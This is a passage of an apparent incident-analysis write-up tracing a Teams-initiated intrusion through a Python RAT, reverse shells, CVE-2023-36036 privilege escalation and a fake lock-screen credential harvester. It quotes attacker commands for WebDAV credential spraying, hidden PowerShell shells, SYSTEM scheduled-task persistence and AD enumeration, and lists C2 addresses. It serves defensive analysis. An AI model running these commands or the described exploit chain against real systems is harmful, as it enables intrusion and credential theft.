undefined;'>ran adsisearcher to enumerate accessible systems</span></p></td></tr><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'><strong>AV-Solutions</strong></span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Securityhealthhost.exe, which is commonly used to verify if anti-virus solutions are running on the system</span></p></td></tr></tbody></table><p style="text-align: center;direction: ltr;"><span style='font-size: undefined;'><em>Table 1: Host Reconnaissance and Environment Enumeration.</em></span></p><p><span style='font-size: undefined;'><em></em></span></p><p style="direction: ltr;"><span style='font-size: undefined;'>All of these commands were executed through hidden PowerShell sessions using the </span><span style='font-size: undefined;'><span data-type='inlineCode'><em>CREATE_NO_WINDOW</em></span></span><span style='font-size: undefined;'> flag, allowing the script to run in the background without spawning visible console windows.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Part of reconnaissance was also a collection of installed hotfixes and system version data. The attacker was able to assess whether the host was vulnerable to a version-specific local privilege escalation exploit later used in the intrusion.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Additionally, </span><span style='font-size: undefined;'><span data-type='inlineCode'>collector.py</span></span><span style='font-size: undefined;'> and all other python modules dropped by malware were obfuscated. However, it was not difficult to recover code structure close to the original. </span></p><p></p><figure style="margin: 0"><div style="display: inline-block"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltb7cd86028d61cd1f/6a049535d885fd9ebe3deb0d/Obfuscated-collector-py.png" alt="Obfuscated-collector-py.png" caption="Figure 3: Obfuscated collector.py" class="embedded-asset" content-type-uid="sys_assets" type="asset" asset-alt="Obfuscated-collector-py.png" style="width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltb7cd86028d61cd1f/6a049535d885fd9ebe3deb0d/Obfuscated-collector-py.png" data-sys-asset-uid="bltb7cd86028d61cd1f" data-sys-asset-filename="Obfuscated-collector-py.png" data-sys-asset-contenttype="image/png" data-sys-asset-caption="Figure 3: Obfuscated collector.py" data-sys-asset-alt="Obfuscated-collector-py.png" data-sys-asset-position="none" sys-style-type="display"/><figcaption style="text-align:center">Figure 3: Obfuscated collector.py</figcaption></div></figure><h2 style="direction: ltr;">Stage 2: Ties to ModeloRAT</h2><p style="direction: ltr;"><span style='font-size: undefined;'>Shortly after reconnaissance is completed, the attack shifts into its second stage as with the execution of </span><span style='font-size: undefined;'><span data-type='inlineCode'>Pmanager.py</span></span><span style='font-size: undefined;'>.</span></p><p style="direction: ltr;"><span style='color:rgb(55, 71, 79);font-size: undefined;'></span></p><pre language="python">pythonw.exe ...\python\Pmanager.py start</pre><p style="text-align: center;direction: ltr;"><span style='font-size: undefined;'><em>Figure 4: Execution of </em></span><span style='font-size: undefined;'><span data-type='inlineCode'><em>Pmanager.py</em></span></span><span style='font-size: undefined;'><em> initiating second-stage C2 activity.</em></span></p><p><span style='font-size: undefined;'><em></em></span></p><p style="direction: ltr;"><span style='font-size: undefined;'>As soon as it is started, the script creates a long-running HTTP beacon over port 80 that rotates across 5 hardcoded C2 servers: </span><span style='font-size: undefined;'><span data-type='inlineCode'>46.225.231[.]170</span></span><span style='font-size: undefined;'>, </span><span style='font-size: undefined;'><span data-type='inlineCode'>144.172.99[.]68</span></span><span style='font-size: undefined;'>, </span><span style='font-size: undefined;'><span data-type='inlineCode'>64.94.85[.]158</span></span><span style='font-size: undefined;'>, </span><span style='font-size: undefined;'><span data-type='inlineCode'>140.82.6[.]45</span></span><span style='font-size: undefined;'>, and </span><span style='font-size: undefined;'><span data-type='inlineCode'>45.76.241[.]51</span></span><span style='font-size: undefined;'>.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>The script can load DLLs via </span><span style='font-size: undefined;'><span data-type='inlineCode'>rundll32.exe</span></span><span style='font-size: undefined;'>, launch additional Python scripts, run PowerShell commands, or install </span><span style='font-size: undefined;'><span data-type='inlineCode'>.msi</span></span><span style='font-size: undefined;'> packages. It also handles persistence and can update or remove itself. The reconnaissance output saved in </span><span style='font-size: undefined;'><span data-type='inlineCode'>configA.json</span></span><span style='font-size: undefined;'> is sent back to the C2, giving the operator a full picture of the host before issuing further tasks.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>This behavior closely matches the ModeloRAT framework documented by Huntress (KongTuke / CrashFix campaigns). Its communication format, persistence mechanisms, and delivery model all match what has been previously observed, with no significant deviations.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>The key difference is in initial access: Where earlier campaigns relied on malicious browser extensions, this intrusion used Microsoft Teams social engineering to achieve execution.</span></p><h3 style="direction: ltr;">The on-demand shells and the WebDAV </h3><p style="direction: ltr;"><span style='font-size: undefined;'><span data-type='inlineCode'>Pmanager</span></span><span style='font-size: undefined;'> quickly deployed its first additional module </span><span style='font-size: undefined;'><span data-type='inlineCode'>USOShared1297.py</span></span><span style='font-size: undefined;'> onto the infected host. This module is a TCP reverse shell that opens 2 outbound sockets to one of 3 hardcoded C2 IPs (</span><span style='font-size: undefined;'><span data-type='inlineCode'>144.172.88[.]18</span></span><span style='font-size: undefined;'>, </span><span style='font-size: undefined;'><span data-type='inlineCode'>64.190.113[.]187</span></span><span style='font-size: undefined;'>, </span><span style='font-size: undefined;'><span data-type='inlineCode'>45.59.122[.]231</span></span><span style='font-size: undefined;'>. The port 50508 is reserved for the interactive shell that the attacker can use and port 60503 is for file transfer. The shell itself is a </span><span style='font-size: undefined;'><span data-type='inlineCode'>cmd.exe</span></span><span style='font-size: undefined;'> spawned using </span><span style='font-size: undefined;'><span data-type='inlineCode'>CreatePipe</span></span><span style='font-size: undefined;'> and </span><span style='font-size: undefined;'><span data-type='inlineCode'>CreateProcessA</span></span><span style='font-size: undefined;'> with the </span><span style='font-size: undefined;'><span data-type='inlineCode'>CREATE_NO_WINDOW</span></span><span style='font-size: undefined;'> and </span><span style='font-size: undefined;'><span data-type='inlineCode'>STARTF_USESTDHANDLES</span></span><span style='font-size: undefined;'> flags.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>This access was then used to test credential reuse across the environment through repeated WebDAV authentication attempts against internal systems.</span></p><p style="direction: ltr;"><span style='color:rgb(55, 71, 79);font-size: undefined;'></span></p><pre language="python">rundll32.exe davclnt.dll,DavSetCookie &lt;HOST&gt; http://&lt;TARGET&gt;/C%24/Windows</pre><p style="text-align: center;direction: ltr;"><span style='font-size: undefined;'><em>Figure 5: WebDAV authentication spray using </em></span><span style='font-size: undefined;'><span data-type='inlineCode'><em>davclnt.dll</em></span></span><span style='font-size: undefined;'><em> (DavSetCookie)</em></span></p><p><span style='font-size: undefined;'><em></em></span></p><p style="direction: ltr;"><span style='font-size: undefined;'>The DavSetCookie API forces Windows to initiate a WebDAV authentication attempt using the current user’s credentials. In effect, it allows the attacker to validate where those credentials are accepted without deploying additional tools. Within minutes, successful logon events started to appear across more than 100 internal systems.</span></p><h3 style="direction: ltr;">The HTTP shell – internal.py</h3><p style="direction: ltr;"><span style='font-size: undefined;'>Not long after, the attacker added a second way into the system by deploying back-to-back </span><span style='font-size: undefined;'><span data-type='inlineCode'>Microsoft5237.py</span></span><span style='font-size: undefined;'> dropped to </span><span style='font-size: undefined;'><span data-type='inlineCode'>%TEMP%</span></span><span style='font-size: undefined;'> and </span><span style='font-size: undefined;'><span data-type='inlineCode'>internal.py</span></span><span style='font-size: undefined;'> dropped to </span><span style='font-size: undefined;'><span data-type='inlineCode'>WPy64-31401\python</span></span><span style='font-size: undefined;'>. Later analysis showed they were actually the same file, just renamed (both had the same SHA-256 hash: 930263c0843744e269b615fb2ec79f83d7bd8b2cbf75e31fd5ea6c1aaa4e48fd). The attacker was reusing the same backdoor under different names.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Each script launched a hidden PowerShell session. First it checked whether the system was domain-joined, and then set up a persistent remote shell.</span></p><p style="direction: ltr;"><span style='color:rgb(55, 71, 79);font-size: undefined;'></span></p><pre language="python">powershell -NonInteractive -NoProfile -WindowStyle Hidden -Command "(Get-CimInstance Win32_ComputerSystem).Domain"
powershell -NoProfile -NoExit -Command -</pre><p style="text-align: center;direction: ltr;"><span style='font-size: undefined;'><em>Figure 6: The </em></span><span style='font-size: undefined;'><span data-type='inlineCode'><em>-NoExit</em></span></span><span style='font-size: undefined;'><em> flag keeps PowerShell running in the background, while the trailing “-” allows it to accept commands remotely.</em></span></p><p><span style='font-size: undefined;'><em></em></span></p><p style="direction: ltr;"><span style='font-size: undefined;'>From there, </span><span style='font-size: undefined;'><span data-type='inlineCode'>internal.py</span></span><span style='font-size: undefined;'> turned that session into a full HTTP-based control channel. It registered with the C2 </span><span style='font-size: undefined;'><span data-type='inlineCode'>/handshake</span></span><span style='font-size: undefined;'>, continuously polled for instructions via </span><span style='font-size: undefined;'><span data-type='inlineCode'>/command/&lt;id&gt;</span></span><span style='font-size: undefined;'>, executed them inside the PowerShell session, and returned output via </span><span style='font-size: undefined;'><span data-type='inlineCode'>/output/&lt;id&gt;</span></span><span style='font-size: undefined;'>. The same channel handles file upload, download, and also screenshot capture. All of this communication ran over port 80 to </span><span style='font-size: undefined;'><span data-type='inlineCode'>87.120.186[.]229</span></span><span style='font-size: undefined;'> and </span><span style='font-size: undefined;'><span data-type='inlineCode'>149.248.78[.]202</span></span><span style='font-size: undefined;'>, blending in with normal web traffic.</span></p><h2 style="direction: ltr;">Stage 3: Privilege escalation via CVE-2023-36036</h2><p style="direction: ltr;"><span style='font-size: undefined;'>After gaining remote access, the attacker executed </span><span style='font-size: undefined;'><span data-type='inlineCode'>ssss.dll</span></span><span style='font-size: undefined;'> to escalate privileges.</span></p><p style="direction: ltr;"><span style='color:rgb(55, 71, 79);font-size: undefined;'></span></p><pre language="python">rundll32.exe ssss.dll startproc Mw2[REDACTED]</pre><p style="text-align: center;direction: ltr;"><span style='font-size: undefined;'><em>Figure 7: Execution of </em></span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'><em>ssss.dll</em></span></span><span style='font-size: undefined;'><em> via </em></span><span style='font-size: undefined;'><span data-type='inlineCode'><em>rundll32</em></span></span><span style='font-size: undefined;'><em>.</em></span></p><p><span style='font-size: undefined;'><em></em></span></p><p style="direction: ltr;"><span style='font-size: undefined;'>The argument that was passed to </span><span style='font-size: undefined;'><span data-type='inlineCode'>startproc</span></span><span style='font-size: undefined;'> is a decryption key. The </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>startproc</span></span><span style='font-size: undefined;'> function uses </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>Mw2[REDACTED]</span></span><span style='font-size: undefined;'> to decrypt the payload.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>The </span><span style='font-size: undefined;'><span data-type='inlineCode'>ssss.dll</span></span><span style='font-size: undefined;'> (SHA-256: b00c1cbcfb98d2618a5c2ccb311da94f3c57709a397be6c8de29839f4e943976) is a reflective loader. The loader is using that key to decrypt an embedded payload in memory and execute it. The decrypted payload is </span><span style='font-size: undefined;'><span data-type='inlineCode'>testdllLPE.dll</span></span><span style='font-size: undefined;'> (SHA-256: d84245f3a374dd5eff8ecfdfad39077d76331fde799e5306430d0fc788db7f1d), a custom privilege escalation exploit targeting CVE-2023-36036. This vulnerability is a heap-based buffer overflow in </span><span style='font-size: undefined;'><span data-type='inlineCode'>cldflt.sys</span></span><span style='font-size: undefined;'>, the Windows Cloud Files Mini Filter Driver.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Within seconds, the helper thread launched </span><span style='font-size: undefined;'><span data-type='inlineCode'>internal.py</span></span><span style='font-size: undefined;'> under a </span><span style='font-size: undefined;'><span data-type='inlineCode'>SYSTEM</span></span><span style='font-size: undefined;'> token, confirming that the exploit successfully modified the process privileges.</span></p><h3 style="direction: ltr;">What is CVE-2023-36036?</h3><p style="direction: ltr;"><span style='font-size: undefined;'>The Cloud Files driver is what makes OneDrive's "Files On-Demand" work, allowing placeholder files to appear locally while being backed by cloud storage. Sync providers (OneDrive, Dropbox, Box) register themselves with the driver using the Cloud Files API, and the driver brokers I/O between the filesystem and the provider.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>CVE-2023-36036 is a heap buffer overflow in how </span><span style='font-size: undefined;'><span data-type='inlineCode'>cldflt.sys</span></span><span style='font-size: undefined;'> processes messages from these providers. By sending crafted data through the driver’s communication interface, an attacker can overflow an internal buffer and corrupt adjacent memory. With controlled heap layout, this corruption becomes a kernel write primitive.</span></p><h3 style="direction: ltr;">Reused technique, adapted exploit</h3><p style="direction: ltr;"><span style='font-size: undefined;'>While analyzing the CVE-2023-36036 exploit, it became clear that the threat actor did not build their methodology from scratch. STAR Labs </span><a href="https://starlabs.sg/blog/2023/11-exploitation-of-a-kernel-pool-overflow-from-a-restrictive-chunk-size-cve-2021-31969/" target="_blank"><span style='font-size: undefined;'>documented</span></a><span style='font-size: undefined;'> a similar chain in their analysis of CVE-2021-31969 also in </span><span style='font-size: undefined;'><span data-type='inlineCode'>cldflt.sys</span></span><span style='font-size: undefined;'>. Their work outlined the core steps: Register a fake sync provider, shape the kernel heap, trigger the overflow, and overwrite a token.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>The exploit we analyzed follows the same general playbook, but adapts it for the CVE-2023-36036 vulnerability.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>The threat actor reused three core steps from the STAR Labs research to stabilize their exploit:</span></p><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Sync provider registration</strong></span><span style='font-size: undefined;'>. The exploit registers itself as "PLURIBUS" with GUID </span><span style='font-size: undefined;'><span data-type='inlineCode'>{904EE598-0511-4664-82A8-22C4A7501044}</span></span><span style='font-size: undefined;'>, pointing to </span><span style='font-size: undefined;'><span data-type='inlineCode'>%TEMP%\cldflt</span></span><span style='font-size: undefined;'>. This causes the driver to treat the directory as a valid Cloud Files root and route file operations through the vulnerable path.</span></p><p style="direction: ltr;"><strong>WNF heap shaping. </strong><span style='font-size: undefined;'>The exploit uses 4 undocumented </span><span style='font-size: undefined;'><span data-type='inlineCode'>ntdll</span></span><span style='font-size: undefined;'> syscalls: </span><span style='font-size: undefined;'><span data-type='inlineCode'>NtCreateWnfStateName</span></span><span style='font-size: undefined;'>, </span><span style='font-size: undefined;'><span data-type='inlineCode'>NtUpdateWnfStateData</span></span><span style='font-size: undefined;'>, </span><span style='font-size: undefined;'><span data-type='inlineCode'>NtDeleteWnfStateData</span></span><span style='font-size: undefined;'>, and </span><span style='font-size: undefined;'><span data-type='inlineCode'>NtQueryWnfStateData</span></span><span style='font-size: undefined;'> to allocate a large number of small objects in the kernel pool. This shapes memory so the overflow lands on controlled data instead of random structures. Without this step, the buffer overflow in </span><span style='font-size: undefined;'><span data-type='inlineCode'>cldflt.sys</span></span><span style='font-size: undefined;'> would write to unpredictable addresses and can crash the system</span></p><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Data-Only Token Overwrite</strong></span><span style='font-size: undefined;'>. Instead of using process injection or shellcode, the exploit uses its own token in kernel memory by flipping a privilege bit to gain </span><span style='font-size: undefined;'><span data-type='inlineCode'>SYSTEM</span></span><span style='font-size: undefined;'> access. What sets </span><span style='font-size: undefined;'><span data-type='inlineCode'>testdllLPE.dll</span></span><span style='font-size: undefined;'> apart is what the operator added on top of that scaffolding.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Kernel discovery method</strong></span><span style='font-size: undefined;'>. It probes the kernel address range in 1 MB steps, measuring minute differences in memory access latency to identify </span><span style='font-size: undefined;'><span data-type='inlineCode'>ntoskrnl</span></span><span style='font-size: undefined;'> base. This avoids calling privileged APIs.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Decoupled execution model</strong></span><span style='font-size: undefined;'>. Instead of elevating the thread running the exploit, this binary spawns a helper thread that continuously polls </span><span style='font-size: undefined;'><span data-type='inlineCode'>PrivilegeCheck(SeDebugPrivilege)</span></span><span style='font-size: undefined;'>. This allows the main exploit thread to crash, hang, or retry the kernel write multiple times without losing the payload. The moment the kernel finally flips the privilege bit, the helper thread detects the change and immediately launches </span><span style='font-size: undefined;'><span data-type='inlineCode'>internal.py</span></span><span style='font-size: undefined;'> as </span><span style='font-size: undefined;'><span data-type='inlineCode'>SYSTEM</span></span><span style='font-size: undefined;'>.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Trigger path</strong></span><span style='font-size: undefined;'>. The vulnerability is reached through the driver’s message handling path. When processing a </span><span style='font-size: undefined;'><span data-type='inlineCode'>FilterSendMessage</span></span><span style='font-size: undefined;'> request, cldflt.sys copies attacker-controlled data into a fixed-size buffer without proper bounds checking, overflowing into adjacent memory, specifically a function pointer.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>To trigger execution, the exploit creates a placeholder file within the fake sync root and writes to it.</span></p><p></p><figure style="margin: 0"><div style="display: inline-block"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltca0df1cf2ce5a5c1/6a0498a37eb54b9a75fd8ba5/CVE-2023-36036-startproc-trigger-sequence.png" alt="CVE-2023-36036-startproc-trigger-sequence.png" caption="Figure 8: CVE-2023-36036 trigger sequence in startproc. A crafted 512-byte message is delivered via FilterSendMessage, a 1024-iteration WNF spray seats the fake kernel object, and the closing WriteFile fires the corrupted callback." class="embedded-asset" content-type-uid="sys_assets" type="asset" asset-alt="CVE-2023-36036-startproc-trigger-sequence.png" style="width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltca0df1cf2ce5a5c1/6a0498a37eb54b9a75fd8ba5/CVE-2023-36036-startproc-trigger-sequence.png" data-sys-asset-uid="bltca0df1cf2ce5a5c1" data-sys-asset-filename="CVE-2023-36036-startproc-trigger-sequence.png" data-sys-asset-contenttype="image/png" data-sys-asset-caption="Figure 8: CVE-2023-36036 trigger sequence in startproc. A crafted 512-byte message is delivered via FilterSendMessage, a 1024-iteration WNF spray seats the fake kernel object, and the closing WriteFile fires the corrupted callback." data-sys-asset-alt="CVE-2023-36036-startproc-trigger-sequence.png" data-sys-asset-position="none" sys-style-type="display"/><figcaption style="text-align:center">Figure 8: CVE-2023-36036 trigger sequence in startproc. A crafted 512-byte message is delivered via FilterSendMessage, a 1024-iteration WNF spray seats the fake kernel object, and the closing WriteFile fires the corrupted callback.</figcaption></div></figure><p>⠀</p><p style="direction: ltr;"><span style='font-size: undefined;'>When the driver intercepts the write to </span><span style='font-size: undefined;'><span data-type='inlineCode'>Link.log</span></span><span style='font-size: undefined;'>, it invokes the corrupted function pointer. This results in a controlled kernel write, which flips the </span><span style='font-size: undefined;'><span data-type='inlineCode'>SeDebugPrivilege</span></span><span style='font-size: undefined;'> bit in the helper thread's token.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>After the </span><span style='font-size: undefined;'><span data-type='inlineCode'>WriteFile</span></span><span style='font-size: undefined;'> call completes, the main exploit thread exits. The helper thread, which was polling </span><span style='font-size: undefined;'><span data-type='inlineCode'>PrivilegeCheck(SeDebugPrivilege)</span></span><span style='font-size: undefined;'> once per second since the exploit started, detects the change and breaks out of its loop. At this point, the privilege escalation has succeeded. The helper thread immediately launches the payload. </span></p><p></p><figure style="margin: 0"><div style="display: inline-block"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltb51776047348a437/6a0498f3ec88c64a624a6902/Helper-thread-execution-after-privilege-escalation.png" alt="Helper-thread-execution-after-privilege-escalation.png" caption="Figure 9: Helper thread execution after privilege escalation succeeds." class="embedded-asset" content-type-uid="sys_assets" type="asset" asset-alt="Helper-thread-execution-after-privilege-escalation.png" style="width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltb51776047348a437/6a0498f3ec88c64a624a6902/Helper-thread-execution-after-privilege-escalation.png" data-sys-asset-uid="bltb51776047348a437" data-sys-asset-filename="Helper-thread-execution-after-privilege-escalation.png" data-sys-asset-contenttype="image/png" data-sys-asset-caption="Figure 9: Helper thread execution after privilege escalation succeeds." data-sys-asset-alt="Helper-thread-execution-after-privilege-escalation.png" data-sys-asset-position="none" sys-style-type="display"/><figcaption style="text-align:center">Figure 9: Helper thread execution after privilege escalation succeeds.</figcaption></div></figure><p style="text-align: center;direction: ltr;"><span style='font-size: undefined;'><em></em></span></p><p>⠀</p><h2 style="direction: ltr;">Stage 4: Post-exploitation </h2><p style="direction: ltr;"><span style='font-size: undefined;'>The newly spawned </span><span style='font-size: undefined;'><span data-type='inlineCode'>internal.py</span></span><span style='font-size: undefined;'> process was running under a </span><span style='font-size: undefined;'><span data-type='inlineCode'>SYSTEM</span></span><span style='font-size: undefined;'> token. The attacker confirmed this with whoami and immediately created a scheduled task (</span><span style='font-size: undefined;'><span data-type='inlineCode'>TempLogA</span></span><span style='font-size: undefined;'>) to execute </span><span style='font-size: undefined;'><span data-type='inlineCode'>internal.py</span></span><span style='font-size: undefined;'> daily at 13:00 with </span><span style='font-size: undefined;'><span data-type='inlineCode'>SYSTEM</span></span><span style='font-size: undefined;'> privileges.</span></p><p style="direction: ltr;"><span style='color:rgb(55, 71, 79);font-size: undefined;'></span></p><pre language="python">schtasks /create /tn TempLogA 
  /tr "C:\Users\USER\AppData\Roaming\WPy64-31401\python\pythonw.exe internal.py" 
/sc daily /st 13:00 /ru SYSTEM /rl HIGHEST /f</pre><p style="text-align: center;direction: ltr;"><span style='font-size: undefined;'><em>Figure 10: Creation of </em></span><span style='font-size: undefined;'><span data-type='inlineCode'><em>SYSTEM</em></span></span><span style='font-size: undefined;'><em>-level scheduled task (</em></span><span style='font-size: undefined;'><span data-type='inlineCode'><em>TempLogA</em></span></span><span style='font-size: undefined;'><em>) for persistence.</em></span></p><p><span style='font-size: undefined;'><em></em></span></p><p style="direction: ltr;"><span style='font-size: undefined;'>With persistence in place, the attacker moved on to Active Directory enumeration.</span></p><p style="direction: ltr;"><span style='color:rgb(55, 71, 79);font-size: undefined;'></span></p><pre language="python">$d = [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain().GetDirectoryEntry().distinguishedName
$s = New-Object DirectoryServices.DirectorySearcher([ADSI]"LDAP://$d")
$s.PageSize = 1000
$s.Filter = "(objectClass=user)"
$s.FindAll().Count</pre><p style="text-align: center;direction: ltr;"><span style='font-size: undefined;'><em>Figure 11: Powershell command returns the total number of domain user accounts.</em></span></p><p><span style='font-size: undefined;'><em></em></span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Shortly after, the compromised account established a remote PowerShell session (</span><span style='font-size: undefined;'><span data-type='inlineCode'>WinRM</span></span><span style='font-size: undefined;'>) to a second host. Once connected, additional enumeration commands were executed through the remote PowerShell process (</span><span style='font-size: undefined;'><span data-type='inlineCode'>wsmprovhost.exe</span></span><span style='font-size: undefined;'>), extending visibility beyond the initial system.</span></p><h3 style="direction: ltr;">Expanding the foothold</h3><p style="direction: ltr;"><span style='font-size: undefined;'>Within hours of privilege escalation and enumeration, 3 additional Python modules were deployed:</span></p><p style="direction: ltr;"><span style='font-size: undefined;'><span data-type='inlineCode'>Microsoft5237.py</span></span><span style='font-size: undefined;'>: HTTP beacon to </span><span style='font-size: undefined;'><span data-type='inlineCode'>87.120.186.229</span></span><span style='font-size: undefined;'> and </span><span style='font-size: undefined;'><span data-type='inlineCode'>149.248.78.202</span></span><span style='font-size: undefined;'>. Captures screenshots via PowerShell, monitors user logins/logouts, uploads files to C2.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'><span data-type='inlineCode'>Dell508.py</span></span><span style='font-size: undefined;'>: Reverse TCP tunnel to </span><span style='font-size: undefined;'><span data-type='inlineCode'>207.246.114.50</span></span><span style='font-size: undefined;'> and </span><span style='font-size: undefined;'><span data-type='inlineCode'>149.28.96.170</span></span><span style='font-size: undefined;'> on port 80, disguised as HTTP upgrade. C2 server instructs victim to connect to specific internal targets; victim relays traffic bidirectionally.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'><span data-type='inlineCode'>PCDr6967.py</span></span><span style='font-size: undefined;'>: SOCKS5 proxy to 96.9.125.29, 144.172.111.49, and 104.194.152.246 on port 50504. Routes attacker's tools (RDP, browsers, Nmap) through victim into internal network.</span></p><h2 style="direction: ltr;">Stage 5: The lock screen that wasn't</h2><p style="direction: ltr;"><span style='font-size: undefined;'>Roughly two hours after privilege escalation, the attacker deployed a second DLL.</span></p><p style="direction: ltr;"><span style='color:rgb(55, 71, 79);font-size: undefined;'></span></p><pre language="python">rundll32.exe com6848.dll,open e8vy[REDACTED]</pre><p style="text-align: center;direction: ltr;"><span style='font-size: undefined;'><em>Figure 12: Execution of </em></span><span style='font-size: undefined;'><span data-type='inlineCode'><em>com6848.dll</em></span></span><span style='font-size: undefined;'><em> via rundll32 to deploy credential harvesting payload.</em></span></p><p><span style='font-size: undefined;'><em></em></span></p><p style="direction: ltr;"><span style='font-size: undefined;'>The </span><span style='font-size: undefined;'><span data-type='inlineCode'>com6848.dll</span></span><span style='font-size: undefined;'> (SHA-256: 30e5a6c982396cdf3157195b540f75096869baa8570f66fab88c07c161be27f0, internal name </span><span style='font-size: undefined;'><span data-type='inlineCode'>apple.dll</span></span><span style='font-size: undefined;'>) is a 32-bit DLL with a single export </span><span style='font-size: undefined;'><strong><span data-type='inlineCode'>open</span></strong></span><span style='font-size: undefined;'>. Its </span><span style='font-size: undefined;'><span data-type='inlineCode'>.rdata</span></span><span style='font-size: undefined;'> section is over 5 MB and contains an encrypted payload. The decryption key was conveniently provided on the command line by the attacker.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Once decrypted, the DLL reflectively loads a second stage </span><span style='font-size: undefined;'><span data-type='inlineCode'><strong>stage2.dll</strong></span></span><span style='font-size: undefined;'> (SHA-256: f5b2dbd8ec9671c0261f093ebc5f3d35920b592458a3b800cc946265111e67d0). This DLL renders a perfect replica of the Windows 10 lock screen, using the embedded font to ensure visual accuracy even on systems where the font isn’t installed. The user sees what appears to be a normal screen lock and types their password to unlock it. The DLL captures it, and writes the result to disk as </span><span style='font-size: undefined;'><span data-type='inlineCode'>yyyy-mm-dd-Log.txt</span></span></p><h3 style="direction: ltr;">What the credential unlocked</h3><p style="direction: ltr;"><span style='font-size: undefined;'>Wait, didn't the operator already have </span><span style='font-size: undefined;'><span data-type='inlineCode'>SYSTEM</span></span><span style='font-size: undefined;'> privileges? Why bother with a fake lock screen?</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>By this point, indeed the operator had </span><span style='font-size: undefined;'><span data-type='inlineCode'>SYSTEM</span></span><span style='font-size: undefined;'>-level access on the host. What they didn't have, though, was the user's domain credentials. </span><span style='font-size: undefined;'><span data-type='inlineCode'>SYSTEM</span></span><span style='font-size: undefined;'> can authenticate using the machine account, but it cannot authenticate as the user. It can't access user-specific resources, such as file shares requiring the user's permissions, mailboxes, web applications expecting user credentials, or RDP sessions that need to establish an interactive logon as that specific domain account.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>The same evening, the attacker used harvested credentials to authenticate via RDP to another workstation in the network. DNS logs showed connections to Dropbox and some internal systems. Additionally, they also performed Kerberoasting against service accounts, requesting vulnerable Kerberos tickets in an attempt to expand access within the environment.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>The following morning, the attacker returned to the second host via RDP and used Microsoft Edge to download the Comae toolkit, including DumpIt, a legitimate memory acquisition tool. Two minutes after unarchiving the Comae toolkit, the threat actor navigated within the browser to </span><span style='font-size: undefined;'><span data-type='inlineCode'><em>uploadnow[.]io</em></span></span><span style='font-size: undefined;'>, which offers free anonymous file upload features. During this browser session, the threat actor searched via Bing if </span><span style='font-size: undefined;'><span data-type='inlineCode'><em>SwissTransfer</em></span></span><span style='font-size: undefined;'> was a safe site to transfer large files, likely evaluating additional exfiltration methods. </span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Shortly after, </span><span style='font-size: undefined;'><span data-type='inlineCode'>DumpIt.exe</span></span><span style='font-size: undefined;'> was executed on the second host. DumpIt captures physical RAM, including LSASS process memory, which can contain cleartext passwords, NTLM hashes, and Kerberos tickets. Based on timing and network activity, the memory dump was likely exfiltrated via </span><span style='font-size: undefined;'><span data-type='inlineCode'>uploadnow[.]io</span></span><span style='font-size: undefined;'>.</span></p><h2 style="direction: ltr;">MITRE ATT&CK techniques</h2><table><colgroup data-width='808'><col style="width:30.94059405940594%"/><col style="width:69.05940594059405%"/></colgroup><tbody><tr><td><p><strong>TECHNIQUE ID</strong></p></td><td><p><strong>TECHNIQUE NAME</strong></p></td></tr><tr><td><p>T1566.003</p></td><td><p>Phishing: Spearphishing via Service</p></td></tr><tr><td><p>T1204.002</p></td><td><p>User Execution: Malicious File</p></td></tr><tr><td><p>T1059.001</p></td><td><p>Command & Scripting: PowerShell</p></td></tr><tr><td><p>T1059.006</p></td><td><p>Command & Scripting: Python</p></td></tr><tr><td><p>T1218.011</p></td><td><p>System Binary Proxy Execution: Rundll32</p></td></tr><tr><td><p>T1106</p></td><td><p>Native API</p></td></tr><tr><td><p>T1053.005</p></td><td><p>Scheduled Task/Job: Scheduled Task</p></td></tr><tr><td><p>T1068</p></td><td><p>Exploitation for Privilege Escalation</p></td></tr><tr><td><p>T1134.001</p></td><td><p>Access Token Manipulation: Token Impersonation</p></td></tr><tr><td><p>T1134.004</p></td><td><p>Access Token Manipulation: Parent PID Spoofing</p></td></tr><tr><td><p>T1562.001</p></td><td><p>Impair Defenses</p></td></tr><tr><td><p>T1027</p></td><td><p>Obfuscated Files or Information</p></td></tr><tr><td><p>T1027.002</p></td><td><p>Software Packing</p></td></tr><tr><td><p>T1027.009</p></td><td><p>Embedded Payloads</p></td></tr><tr><td><p>T1620</p></td><td><p>Reflective Code 